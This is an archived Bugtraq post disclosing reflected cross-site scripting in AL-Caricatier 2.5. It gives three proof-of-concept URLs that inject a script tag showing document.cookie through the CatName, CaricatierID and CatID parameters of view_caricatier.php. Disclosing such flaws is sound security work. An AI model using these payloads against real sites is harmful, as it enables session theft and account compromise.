XSS in AL-Caricatier

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in AL-Caricatier
From: xx_hack_xx_2004@xxxxxxxxxxx
Date: 28 Mar 2006 00:04:20 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello
Vulnerable: AL-Caricatier,V.2.5
http://www.php-ar.com

Exploit :
http://example.com/AL-Caricatier/view_caricatier.php?CatName='><script>alert(document.cookie);</script>

http://example.com/AL-Caricatier/view_caricatier.php?CaricatierID='><script>alert(document.cookie);</script>

http://example.com/AL-Caricatier/view_caricatier.php?CatID='><script>alert(document.cookie);</script>

Discovery by Linux_Drox

http://LeZr.Com

Best Regards ,,

Prev by Date: Genius VideoCAM NB Local Privilege Escalation
Next by Date: Secunia Research: Blazix Web Server JSP Source Code Disclosure Vulnerability
Previous by thread: Genius VideoCAM NB Local Privilege Escalation
Next by thread: Secunia Research: Blazix Web Server JSP Source Code Disclosure Vulnerability
Index(es):
- Date
- Thread